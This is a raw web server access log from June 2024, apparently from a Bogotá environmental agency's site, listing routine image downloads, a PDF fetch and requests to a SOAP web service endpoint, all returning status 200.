69.171.249.15 - - [27/Jun/2024:06:03:32 -0500] "GET /images/1%20de%20febrero%20Humedal%20El%20Tunjo.jpeg HTTP/1.1" 200 52973
69.171.249.4 - - [27/Jun/2024:06:03:34 -0500] "GET /images/Archivo%20pacto%20aire%2023%20enero.jpeg HTTP/1.1" 200 28889
69.171.249.6 - - [27/Jun/2024:06:03:35 -0500] "GET /images/Humedal%20Tunjo%20RAMSAR.jpeg HTTP/1.1" 200 120269
69.171.249.5 - - [27/Jun/2024:06:03:36 -0500] "GET /images/Fauna%20Silvestre%20SDA%2002.jpeg HTTP/1.1" 200 41590
69.171.249.11 - - [27/Jun/2024:06:03:37 -0500] "GET /images/Aire%20Reyes%20(1)%20(1).jpeg HTTP/1.1" 200 59709
69.171.249.7 - - [27/Jun/2024:06:03:38 -0500] "GET /images/mantener-calidad-del-aire_optimized.jpeg HTTP/1.1" 200 67646
69.171.249.115 - - [27/Jun/2024:06:03:48 -0500] "GET /images/Entrenubes%201%20(1)%20(1).jpeg HTTP/1.1" 200 70096
69.171.249.6 - - [27/Jun/2024:06:03:52 -0500] "GET /images/Musgo%20SDA%20(1)%20(1).png HTTP/1.1" 200 302122
69.171.249.112 - - [27/Jun/2024:06:03:57 -0500] "GET /images/Reciclaton%20Nov%202022%20(1)%20(1).jpeg HTTP/1.1" 200 53811
201.245.192.253 - - [27/Jun/2024:06:04:08 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [27/Jun/2024:06:04:09 -0500] "GET /BLA/resoluciones/AUTOS%202023/0686.pdf HTTP/1.1" 200 1418777
69.171.249.7 - - [27/Jun/2024:06:04:41 -0500] "GET /images/lluvias-arboles-4-junio.jpeg HTTP/1.1" 200 117524
69.171.249.6 - - [27/Jun/2024:06:04:41 -0500] "GET /images/Junio%2002-experiencias-jardines-verticales-sda.jpeg HTTP/1.1" 200 31171
69.171.249.6 - - [27/Jun/2024:06:04:42 -0500] "GET /images/empresas-industrias-forestales-1-junio.jpg HTTP/1.1" 200 44019
201.245.192.253 - - [27/Jun/2024:06:04:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
69.171.249.8 - - [27/Jun/2024:06:04:44 -0500] "GET /images/facebook-live-ivc-MAYO27.png HTTP/1.1" 200 480404
69.171.249.9 - - [27/Jun/2024:06:04:44 -0500] "GET /images/energia-eficiencia-26-mayo.jpg HTTP/1.1" 200 46417
69.171.249.3 - - [27/Jun/2024:06:04:44 -0500] "GET /images/visita-suspension-humedal-techo-24-mayo.jpg HTTP/1.1" 200 57365
69.171.249.2 - - [27/Jun/2024:06:04:45 -0500] "GET /images/control-madera-ilegal-24-mayo.jpg HTTP/1.1" 200 48269
69.171.249.10 - - [27/Jun/2024:06:04:45 -0500] "GET /images/bogota-polvo-sahara-23-mayo.jpg HTTP/1.1" 200 35039
69.171.249.10 - - [27/Jun/2024:06:04:46 -0500] "GET /images/Naturalista1.jpeg HTTP/1.1" 200 202073
69.171.249.5 - - [27/Jun/2024:06:04:46 -0500] "GET /images/feria-servicios-tramites-19-mayo.jpg HTTP/1.1" 200 40581
69.171.249.10 - - [27/Jun/2024:06:04:47 -0500] "GET /images/actividades-dia-aves-16-mayo.jpg HTTP/1.1" 200 147089
69.171.249.3 - - [27/Jun/2024:06:04:47 -0500] "GET /images/arbolado-bogota-mayo-13.jpg HTTP/1.1" 200 62568
69.171.249.7 - - [27/Jun/2024:06:04:47 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
69.171.249.2 - - [27/Jun/2024:06:04:48 -0500] "GET /images/secretaria-rio-bogota-avances-12-mayo.jpg HTTP/1.1" 200 37281
69.171.249.9 - - [27/Jun/2024:06:04:48 -0500] "GET /images/feria-servicios-12-mayo-principal.jpg HTTP/1.1" 200 44744
69.171.249.116 - - [27/Jun/2024:06:04:48 -0500] "GET /images/dia-rio-bogota-12-mayo.jpg HTTP/1.1" 200 44387
69.171.249.13 - - [27/Jun/2024:06:04:50 -0500] "GET /images/secretaria-carolina-economia-circular-6-mayo.jpg HTTP/1.1" 200 33699
69.171.249.6 - - [27/Jun/2024:06:04:50 -0500] "GET /images/Brasil1.jpeg HTTP/1.1" 200 27965
69.171.249.9 - - [27/Jun/2024:06:04:50 -0500] "GET /images/RCD1.jpg HTTP/1.1" 200 195843
69.171.249.2 - - [27/Jun/2024:06:04:50 -0500] "GET /images/feria-servicios-5-MAYO.jpg HTTP/1.1" 200 39759
69.171.249.7 - - [27/Jun/2024:06:04:51 -0500] "GET /images/Animales1.jpeg HTTP/1.1" 200 76841
69.171.249.115 - - [27/Jun/2024:06:04:51 -0500] "GET /images/accion-climatica.jpg HTTP/1.1" 200 417776
69.171.249.113 - - [27/Jun/2024:06:04:51 -0500] "GET /images/cerros-bogota-2-mayo.jpg HTTP/1.1" 200 98367
69.171.249.3 - - [27/Jun/2024:06:04:52 -0500] "GET /images/fachada-secretaria-ambiente-abril.jpg HTTP/1.1" 200 148853
69.171.249.5 - - [27/Jun/2024:06:04:53 -0500] "GET /images/operativos-residuos-peligrosos-25-ABRIL.jpg HTTP/1.1" 200 35345
69.171.249.113 - - [27/Jun/2024:06:04:54 -0500] "GET /images/plantacion-jbb-22-abril.jpg HTTP/1.1" 200 52184
